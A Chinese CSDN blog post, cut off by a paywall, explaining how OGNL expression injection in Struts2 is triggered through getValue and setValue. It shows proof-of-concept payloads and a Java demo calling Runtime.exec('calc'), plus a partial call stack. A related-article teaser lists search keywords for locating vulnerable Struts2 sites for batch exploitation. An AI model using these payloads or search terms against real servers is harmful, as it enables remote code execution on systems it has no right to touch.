OGNL漏洞原理全解

于 2023-09-13 15:00:55 发布
阅读量113 收藏
点赞数
文章标签: python 开发语言 系统安全 网络安全 web安全 安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MachinegunJoe777/article/details/132854089
版权

 0x00 前言

说到OGNL,可能很多师傅都会想到struts2,在Struts2漏洞分析的道路上,可能在学习的过程中浅尝而止,也或许挨着分析了一遍,但是每次都是停到了setValue或者getValue这里,本篇将和大家分享,setValue和getValue中详细的内容,揭开Struts2最后一层纱,看完本篇后,希望可以对整个系列,包括并不限于Struts漏洞系列有一个更深的了解。

知识浅薄,往各位大佬留情。

0x01 漏洞触发方式

关于OGNL的基础知识我们就不啰嗦了,网上一查一大堆,我们主要还是说通过什么方式可以触发,通常我们触发是通过两个方式触发的,一种是setvalue,还有一种是getvalue,所有的漏洞都是通过这两个方法来进行触发的,就类似于jndi漏洞的lookup一样。

市面上的payload主要分为两种,一种是setvalue的payload,还有一种是getvalue的payload,在本篇中,将会详细讲述两种payload的区别,以及为什么payload要这样构造的原因。

"@java.lang.Runtime@getRuntime().exec('calc')"

("@java.lang.Runtime@getRuntime().exec('calc')")(aba)(aba)

0x02 getValue

我们先从相对基础以及简单的getValue开始讲起,首先是Demo

   public static void main(String[] args) throws OgnlException {
        Map context = new HashMap();
        Ognl.getValue("@java.lang.Runtime@getRuntime().exec(\"calc\")", context, "");
    }

然后是完整的调用链:

exec:347, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeMethod:491, OgnlRuntime (ognl)
callAppropriateMethod:785, OgnlRuntime (ognl)
callMethod:61, ObjectMethodAccessor (ognl)
callMethod:819, OgnlRuntime (ognl)
getValueBody:75, ASTMethod (ognl)
evaluateGetValueBody:170, SimpleNode (ognl)
getValue:210, SimpleNode (ognl)
getValueBody:109, ASTChain (ognl)
evaluateGetValueBody:170, SimpleNode (ognl)
getValue:210, Simp
最低0.47元/天 解锁文章
DxAxFxA
关注
OGNL漏洞原理与解决方案
MoYanHanHuiLengMa的博客
12-09 1527
一,漏洞存在的地方和原理 Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数: Java代码 ?user.address.city=Bishkek&user['favoriteDrink']=kumys...
Struts2 OGNL 漏洞
weixin_34194087的博客
11-23 634
2019独角兽企业重金招聘Python工程师标准>>> ...
Struts2 漏洞彻底解决办法
tudingdang的专栏
07-13 231
Beetl最近也没有更新,正好有时间贡献点其他方面的文章。Struts2官方已经发布了多次漏洞补丁,但根源在于OGNL能调用静态办法,所以彻底解决漏洞的办法是底层禁止OGNL调用一些特定的java类,如System,Runtime类 我们底层入手,调用OGNLRuntime静态方法,设置我们自己的MethodAccessor类,能禁止OGNL在表达式中调用Runtime,System等类。这...
Confluence OGNL 注入 (CVE-2022-26134)
weixin_47515220的博客
09-26 1818
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证的远程代码执行漏洞OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。
OGNL高危拒绝服务漏洞及修复方案
10-14 402
东方联盟郭盛华/漏洞描述: OGNL缓存投毒漏洞攻击者可利用该漏洞进行拒绝服务攻击。 影响版本: Struts2.0.0-2.3.24.1 漏洞等级: 高危 修复建议: 1、升级 OGNL到 3.0.12版本以上。 2、升级Struts到最新版。 3、使用百度云加速WAF防火墙进行防御。 4、添加网站至云观测,及时了解网站组件突发/0day漏洞。 ...
Struts2深入学习----OGNL表达式原理
04-07
这篇深入学习的文章主要探讨了OGNL表达式的原理和使用。 首先,我们来理解一下OGNL是什么。OGNL是一种强大的表达式语言,允许开发者通过简单的字符串表达式来访问和修改对象图。在Struts2中,OGNL用于在Action和...
struts2OGNL攻击漏洞解决记录
城之残垣的专栏
04-28 1174
http://struts.apache.org/development/2.x/docs/s2-005.html 在struts的配置文件中的基类过滤拦截器加上 "params"> "excludeParams">dojo\..*,^struts\..*,.*\\.*,.*\(.*,.*\).*,.*@.* 进行控制
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134)
Brucetg的博客
06-06 4488
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
【风险预警】Confluence Wiki OGNL注入漏洞(CVE-2022-26134)
murphysec的博客
06-04 4578
6月4日,墨菲安全实验室监测发现Atlassian修复了Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞。Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞在Confluence Server 或 Confluence Data Center 系统中执行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat
OGNL表达式注入漏洞要成为过去了吗?
u013224189的专栏
07-18 8532
起因 Struts2今年来爆出一系列安全漏洞,以至于在官方release页面,还专门罗列了各个版本对应的CVE漏洞,也算是一大奇观。 ![struts_release](https://img-blog.csdn.net/20180716180339458?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTMyMjQxODk=/font/5a6...
Struts2.1.8 Ognl 漏洞浅析和解决方案
热门推荐
xlxxcc的专栏
08-21 1万+
前面的话   工作了好几点,一直都没有认认真真的去写过什么东西,趁着最近这段时间有空,总结一下这几年在工作中的一些经验,尤其是Struts2 Ognl 漏洞,当年不知道影响了多少个互联网企业。现在把他记录下来,作为对几年工作的一个回忆吧。   如果您是对Struts2不熟悉,又想测试Struts2 Ognl 漏洞的读者,请下先移步到Struts2 入门示例,里面有一个简单的Struts示例,
Maven Struts2
十年彩虹
09-10 643
org.apache.struts struts2-core ${struts.version} org.apache.struts struts2-json-plugin ${struts.version} org.apache.struts struts2-spring-plugin ${struts.version}
ognl表达式中%{}的作用
小蜗牛的博客
04-11 619
在struts2字符串中用%{}指出,其内部是一个ognl表达式,需要解析。 如<s:textfield lable="user" name="user" value="%{#session.user}" /> 不过有些标签默认认定,整个字符串就是一个表达式,所以不用%{} 如<s:property value="#session.user" /> 在非struts2标签中...
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2287
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084,漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 Confluence是Atlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
OGNL表达式语言介绍
天天开心
09-29 223
OGNL表达式语言介绍 [code] OGNL介绍 OGNL是Object-Graph Navigation Language的缩写,它是一种功能强大的表达式语言(Expression Language,简称为EL),通过它简单一致的表达式语法,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。它使用相同的表达式去存取对象的属性。 XWork遵循...
Struts2 OGNL漏洞 测试
milife2012的专栏
10-10 7313
这东西一开始下到还不会利用 这篇文章写的不错但是关键字不咋好用比较少 然后就开始了批量拿了并且自己和朋友也想了一些关键字 Inurl:index.action Inurl:商城.achtion (商城比较多) Inurl:index.achtion 标题:apache struts2 Inurl:action?id= 没有NB的关键字 只有爱想的脑袋 关键字不唯一可能你多想想就能
tomcat ognl漏洞利用
最新发布
09-16
对于 Tomcat OGNL(Object-Graph Navigation Language)漏洞的利用,需要先了解漏洞的背景和影响。 Tomcat OGNL 漏洞是一种远程代码执行漏洞,影响 Apache Tomcat 服务器版本7.x至9.x。该漏洞允许攻击者通过构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值